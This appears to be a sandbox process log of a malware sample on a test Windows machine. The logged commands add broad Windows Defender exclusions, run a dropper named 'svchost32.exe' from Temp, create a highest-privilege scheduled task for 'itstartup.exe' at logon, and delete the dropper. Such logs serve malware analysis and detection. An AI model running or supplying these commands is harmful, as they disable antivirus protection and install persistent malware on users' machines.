cmd.exe cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit
932powershell.exe powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"
808powershell.exe powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"
2756cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
816powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
836powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
972powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Local\Temp'
2292powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
2952cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\itstartup.exe"
2312cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "itstartup" /tr '"C:\Windows\system32\itstartup.exe"' & exit
2240schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "itstartup" /tr '"C:\Windows\system32\itstartup.exe"'
1788cmd.exe "cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit
1616powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22'
1280powershell.exe powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\test22\AppData\Roaming'
1792cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\itstartup.exe"
532svchost32.exe C:\Users\test22\AppData\Local\Temp\svchost32.exe "C:\Windows\system32\itstartup.exe"
1172cmd.exe "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "itstartup" /tr '"C:\Windows\system32\itstartup.exe"' & exit
2032schtasks.exe schtasks /create /f /sc onlogon /rl highest /tn "itstartup" /tr '"C:\Windows\system32\itstartup.exe"'
2704cmd.exe "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\test22\AppData\Local\Temp\svchost32.exe"
2792choice.exe choice /C Y /N /D Y /T 3
2104